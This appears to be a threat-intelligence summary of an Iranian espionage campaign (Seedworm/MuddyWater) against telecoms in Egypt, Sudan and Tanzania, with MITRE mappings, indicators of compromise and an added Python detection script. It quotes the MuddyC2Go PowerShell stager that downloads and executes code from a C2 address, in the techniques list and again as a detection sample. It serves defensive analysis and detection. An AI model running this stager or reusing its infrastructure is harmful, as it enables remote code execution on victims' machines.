Seedworm: Iranian Hackers Target Telecoms Orgs in North and East Africa

Seedworm (also tracked as MuddyWater), an Iranian cyberespionage group, targeted telecommunications organizations in Egypt, Sudan, and Tanzania in a November 2023 campaign. The operation used the MuddyC2Go framework together with legitimate remote-access software and publicly available tools (SimpleHelp, Venom Proxy, AnyDesk) and PowerShell to establish and maintain command-and-control and persistence.
#Seedworm #MuddyC2Go

Keypoints

  • Seedworm targeted telecom organizations in Egypt, Sudan, and Tanzania during a November 2023 operation.
  • The attackers sideloaded MuddyC2Go via jabswitch.exe, with the C2 URL read from the Windows registry.
  • The toolset includes SimpleHelp, Venom Proxy, AnyDesk, a custom keylogger, and PowerShell-based stagers.
  • The attack chain features a MuddyC2Go PowerShell loader, scheduled task execution, and Impacket WMIExec usage.
  • Prior intrusions in 2023 show extensive SimpleHelp activity (PowerShell, proxy tools, SAM hive dumping, WMI, JumpCloud) attributed to Seedworm.
  • MuddyC2Go represents an evolution with new C2 infrastructure, embedded PowerShell, and Go-based components linked to Seedworm, with Stark Industries hosting observed C2 servers.

MITRE Techniques

  • [T1059.001] PowerShell – The MuddyC2Go launcher executed the following PowerShell code to connect to its command-and-control (C&C) server. The long random variable name at the start is filler; the working part is the download of a second stage with Invoke-WebRequest followed by its execution with iex: 'tppmjyfiqnqptrfnhhfeczjgjicgegydytihegfwldobtvicmthuqurdynllcnjworqepp;$tppmjyfiqnqptrfnhhfeczjgjicgegydytihegfwldobtvicmthuqurdynllcnjworqepp="tppmjyfiqnqptrfnhhfeczjgjicgegydytihegfwldobtvicmthuqurdynllcnjworqepp";$uri ="http://95.164.38[.]99:443/HR5rOv8enEKonD4a0UdeGXD3xtxWix2Nf";$response = Invoke-WebRequest -Uri $uri -Method GET -ErrorAction Stop -usebasicparsing;iex $response.Content;'
  • [T1574.002] DLL side-loading – The MuddyC2Go launcher, named 'vcruntime140.dll', was saved in the folder 'CSIDL_COMMON_APPDATA\javax' (normally C:\ProgramData\javax) next to a benign Java 'jabswitch.exe', which loaded it in place of the legitimate Visual C++ runtime DLL.
  • [T1012] Query Registry – The malware reads the C&C URL from the Windows registry value 'End' stored inside the key 'HKLM\SYSTEM\CurrentControlSet\Services\Tcpip'. The URL path is read from the 'Status' value in the same key. Neither value belongs to a legitimate Tcpip service configuration, so their presence is a useful hunting lead.
  • [T1053.005] Scheduled Task – The MuddyC2Go launcher executed via a scheduled task that had previously been created.
  • [T1047] Windows Management Instrumentation – The attackers used Impacket WMIExec hacktool to execute commands on the remote system.
  • [T1219] Remote Access Software – The SimpleHelp remote access tool was leveraged, connecting to the 146.70.124[.]102 C&C server; AnyDesk was also deployed on the same machine, giving the attackers a second remote-access channel.
  • [T1056.001] Keylogging – A custom keylogging tool was used as part of the payload.
  • [T1003.002] OS Credential Dumping: Security Account Manager – Prior activity included dumping the SAM hive and related credential access activity.
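The three host-side techniques above (the download-and-iex stager, vcruntime140.dll side-loaded by jabswitch.exe from ProgramData\javax, and the 'End'/'Status' values under the Tcpip service key) each leave a distinct trace in endpoint telemetry. The following is an added detection example written for this page; it is not Symantec's or Seedworm's code. The event records are constructed to resemble Sysmon-style telemetry (PowerShell script-block text, image loads, registry value sets) and their field names are assumptions, not a real log schema. The stager text reuses the launcher stub quoted above, with the filler variable shortened.

```python
"""Detection helpers for the Seedworm/MuddyC2Go host tradecraft described above.

Added example, not code from the original page or from Symantec. The event
records are constructed samples; field names ("type", "image", "loaded",
"key", "value") are assumptions standing in for a real telemetry schema.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Shape of the MuddyC2Go launcher stub: a URL assigned to $uri, fetched with
# Invoke-WebRequest, then the response body executed with iex.
LAUNCHER_RE = re.compile(
    r"\$uri\s*=\s*[\"'](?P<url>https?://[^\"']+)[\"'].*?"
    r"Invoke-WebRequest\s+-Uri\s+\$uri.*?iex\s+\$response\.Content",
    re.IGNORECASE | re.DOTALL,
)

# Key the launcher reads its C&C URL ('End') and URL path ('Status') from.
TCPIP_KEY = r"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip"
SUSPICIOUS_VALUES = {"end", "status"}

# Constructed sample: the page's launcher with the filler variable shortened.
SAMPLE_LAUNCHER = (
    'junk;$junk="junk";'
    '$uri ="http://95.164.38.99:443/HR5rOv8enEKonD4a0UdeGXD3xtxWix2Nf";'
    "$response = Invoke-WebRequest -Uri $uri -Method GET -ErrorAction Stop "
    "-usebasicparsing;iex $response.Content;"
)

# Constructed sample events (assumed schema), one benign control per type.
EVENTS = [
    {"type": "scriptblock", "text": SAMPLE_LAUNCHER},
    {"type": "image_load",
     "image": r"C:\ProgramData\javax\jabswitch.exe",
     "loaded": r"C:\ProgramData\javax\vcruntime140.dll"},
    {"type": "image_load",
     "image": r"C:\Program Files\Java\jre1.8.0_391\bin\jabswitch.exe",
     "loaded": r"C:\Windows\System32\vcruntime140.dll"},
    {"type": "reg_set", "key": TCPIP_KEY, "value": "End", "data": "http://..."},
    {"type": "reg_set", "key": TCPIP_KEY, "value": "Start", "data": "1"},
]


@dataclass
class Alert:
    technique: str
    detail: str


def extract_c2_url(scriptblock: str) -> str | None:
    """Return the C&C URL if the script block matches the download-and-iex stub."""
    m = LAUNCHER_RE.search(scriptblock)
    return m.group("url") if m else None


def is_sideload(image: str, loaded: str) -> bool:
    """True when jabswitch.exe loads vcruntime140.dll from its own directory.

    Side-loading requires the rogue DLL to sit beside the EXE; the genuine CRT
    is normally resolved from System32, so that location is treated as benign.
    """
    img, dll = image.lower(), loaded.lower()
    if not img.endswith("\\jabswitch.exe") or not dll.endswith("\\vcruntime140.dll"):
        return False
    img_dir = img.rsplit("\\", 1)[0]
    dll_dir = dll.rsplit("\\", 1)[0]
    return img_dir == dll_dir and not dll_dir.startswith(r"c:\windows\system32")


def is_tcpip_c2_value(key: str, value: str) -> bool:
    """True for the 'End'/'Status' values the launcher reads under the Tcpip key."""
    return key.lower() == TCPIP_KEY.lower() and value.lower() in SUSPICIOUS_VALUES


def scan(events: list[dict]) -> list[Alert]:
    """Run all three checks over a stream of events and collect alerts."""
    alerts: list[Alert] = []
    for ev in events:
        if ev["type"] == "scriptblock":
            url = extract_c2_url(ev["text"])
            if url:
                alerts.append(Alert("T1059.001", f"download-and-iex stager contacting {url}"))
        elif ev["type"] == "image_load" and is_sideload(ev["image"], ev["loaded"]):
            alerts.append(Alert("T1574.002", f"{ev['loaded']} side-loaded by {ev['image']}"))
        elif ev["type"] == "reg_set" and is_tcpip_c2_value(ev["key"], ev["value"]):
            alerts.append(Alert("T1012", f"value '{ev['value']}' set under {ev['key']}"))
    return alerts


if __name__ == "__main__":
    for alert in scan(EVENTS):
        print(alert.technique, alert.detail)
```

Each check keys on behaviour rather than on a hash or IP, so it survives re-packing of the DLL or a change of C&C server: the stager check catches any variable-name filler as long as the fetch-then-iex sequence is intact, the side-load check fires for any copy of jabswitch.exe paired with a vcruntime140.dll outside System32, and the registry check fires on the value names the launcher depends on.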

Indicators of Compromise

    File Indicators

  • [File] 1a0827082d4b517b643c86ee678eaa53f85f1b33ad409a23c50164c3909fdaca – MuddyC2Go DLL launcher
  • [File] 25b985ce5d7bf15015553e30927691e7673a68ad071693bf6d0284b069ca6d6a – Benign Java(TM) Platform SE 8 executable used for sideloading MuddyC2Go DLL
  • [File] eac8e7989c676b9a894ef366357f1cf8e285abde083fbdf92b3619f707ce292f – Custom keylogger
  • [File] 3916ba913e4d9a46cfce437b18735bbb5cc119cc97970946a1ac4eab6ab39230 – Venom Proxy
    Network Indicators

  • [Network] 146.70.124[.]102 – SimpleHelp C&C server
  • [Network] 94.131.109[.]65 – MuddyC2Go C&C server
  • [Network] 95.164.38[.]99 – MuddyC2Go C&C server
  • [Network] 45.67.230[.]91 – MuddyC2Go C&C server
  • [Network] 45.150.64[.]39 – MuddyC2Go C&C server
  • [Network] 95.164.46[.]199 – MuddyC2Go C&C server
  • [Network] 94.131.98[.]14 – MuddyC2Go C&C server
  • [Network] 94.131.3[.]160 – GoSOCKS5proxy C&C server

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms